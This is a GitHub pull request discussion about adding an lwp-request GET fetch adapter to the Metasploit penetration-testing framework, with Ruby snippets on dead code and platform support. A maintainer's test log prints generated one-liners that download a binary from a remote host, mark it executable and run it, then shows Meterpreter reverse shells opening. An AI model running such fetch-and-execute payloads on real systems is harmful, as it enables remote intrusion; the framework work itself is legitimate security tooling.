Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter #20451


Open: wants to merge 1 commit into master

Conversation

@bcoles (Contributor) commented Aug 5, 2025

See a previous similar rex-exploitation PR here: rapid7/rex-exploitation#22

```ruby
# There is no way to disable cert check in GET ...
print_error('GET binary does not support insecure mode')
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
```
Contributor Author:

This is dead code as it will never be called. I copied the same code pattern from the wget adapter above (which also contains dead code). Presumably the fail_with was meant to be conditional.

Contributor:

Huh; yes, this came from the certutil command generation. Certutil is a bit of a pain in that I don't think you can opt out of the cert check, and this was a way to force the user to accept that limitation, but we don't have that option in here to set. Curious if it was something I forgot to add or something I stripped out after the fact.
Regardless, it should not be here, right?
I want to do a check to see if we can set the cert for the httpserver or if certutil simply cannot use https in this case.
#20453

Contributor Author:

> I copied the same code pattern from the wget adapter above (which also contains dead code)

> yes, this came from the certutil command generation.

My mistake - you're right, I copied it from the certutil command generation (not wget).

> Regardless, it should not be here, right?

GET has the same limitation as certutil in that insecure certificates cannot be accepted.

This line may be misleading, but leaving it is harmless. The subsequent variable assignment is useless.

I'm fine to leave it in for consistency, to be changed when the appropriate functionality is implemented, or to change it to a TODO comment.
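
The point raised in this thread, that `fail_with` aborts the module so the assignment after an unconditional `fail_with` can never execute, is easy to check in isolation. The following is an added example, not code from the PR or from Metasploit: `BadConfig`, `fail_with`, `get_file_cmd` and `rejects_insecure_get?` are stand-ins that model the pattern with the check made conditional on the `FETCH_CHECK_CERT` setting, which is what the review suggests was intended. The address and path values are constructed sample input.

```ruby
# Added example (not Metasploit's own code): a minimal model of the review
# point that fail_with aborts the module, so an assignment placed after an
# unconditional fail_with is unreachable. The check is only meaningful when
# it is conditional on the FETCH_CHECK_CERT setting.

# Stand-in for Msf::Module::Failure::BadConfig.
class BadConfig < StandardError; end

# Stand-in for Msf::Module#fail_with: it raises and never returns, which is
# why any statement following an unconditional call is dead code.
def fail_with(reason, msg)
  raise reason, msg
end

# Hypothetical helper mirroring the GET command generation under review.
# lwp-request's GET has no option to skip certificate verification, so an
# HTTPS fetch with FETCH_CHECK_CERT=false is rejected as a bad config rather
# than silently producing a command that would still verify the cert.
def get_file_cmd(download_uri:, remote_destination:, check_cert: true, protocol: 'https')
  if protocol == 'https' && !check_cert
    fail_with(BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
  end
  # Specifying the method (-m GET) is necessary on OSX, as noted in the PR.
  "GET -m GET #{protocol}://#{download_uri}>#{remote_destination}"
end

# Regression check for the guard: true when the insecure HTTPS configuration
# is rejected, false if it slips through and a command is generated anyway.
def rejects_insecure_get?(download_uri, remote_destination)
  get_file_cmd(download_uri: download_uri, remote_destination: remote_destination, check_cert: false)
  false
rescue BadConfig
  true
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample values (documentation-range address, not a real host).
  puts get_file_cmd(download_uri: '192.0.2.10:8080/payload', remote_destination: './payload')
  puts rejects_insecure_get?('192.0.2.10:8080/payload', './payload')
end
```

Because `fail_with` raises, the original ordering (unconditional `fail_with` followed by the assignment) would never reach the assignment; wrapping the call in the `if` is what turns the misleading line into an actual configuration check.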

```ruby
print_error('GET binary does not support insecure mode')
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
when 'FTP'
```
Contributor Author:

FTP code path has not been tested.

It looks like this is supposed to be based on fetch_protocol, but I found no way to control this from within msfconsole.

Contributor:

I noticed recently that we don't have an FTP fetch server... it is on my list of cleanup tasks.

@msutovsky-r7 self-assigned this Aug 7, 2025

@msutovsky-r7 (Contributor) commented:

```text
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > generate -f raw
GET -m GET http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w>./MLSDZDNWR;chmod +x ./MLSDZDNWR;./MLSDZDNWR&
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Sending stage (3090404 bytes) to 10.5.134.150
[*] Meterpreter session 1 opened (192.168.3.7:4444 -> 10.5.134.150:37020) at 2025-08-07 14:47:15 +0200

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > sessions 

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         meterpreter x64/linux  msfuser @ 10.5.134.150  192.168.3.7:4444 -> 10.5.134.150:370
                                                           20 (10.5.134.150)

msf payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
getuidComputer     : 10.5.134.150
OS           : Ubuntu 22.04 (Linux 6.8.0-1031-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > generate -f raw 
GET -m GET http://192.168.3.7:8080/God8ZegEq240xmv_PfQwmA>./jACOtFIlh;chmod +x ./jACOtFIlh;./jACOtFIlh&
msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 3

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > [*] Started reverse TCP handler on 192.168.3.7:4242 
[*] Meterpreter session 2 opened (192.168.3.7:4242 -> 10.5.134.150:60588) at 2025-08-07 14:53:27 +0200

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions 

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  2         meterpreter x64/linux  msfuser @ 10.5.134.150  192.168.3.7:4242 -> 10.5.134.150:605
                                                           88 (10.5.134.150)

msf payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.134.150
OS           : Ubuntu 22.04 (Linux 6.8.0-1031-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
```

```ruby
def _generate_get_pipe
# Specifying the method (-m GET) is necessary on OSX
execute_cmd = 'sh'
execute_cmd = 'cmd' if windows?
```
Contributor:

If I understand correctly, GET is only supported by Linux - does this make sense here? Or is it for the sake of keeping the pattern?

Contributor Author:

> If I understand correctly, GET is only supported by Linux - does this make sense here? Or is it for the sake of keeping the pattern?

It is largely for keeping the pattern. I don't think this conditional will ever be called, as GET is listed only for Linux options (lib/msf/core/payload/adapter/fetch/linux_options.rb) but not Windows options (lib/msf/core/payload/adapter/fetch/windows_options.rb).

GET is supported by Linux and Mac OSX and likely by any other UNIX derived platform which supports Perl and lwp-request. I'm not sure if lwp-request supports Windows (outside of WSL), but it's written in Perl, so maybe. In the event that GET does run on Windows, piping to cmd (as defined here) should work.
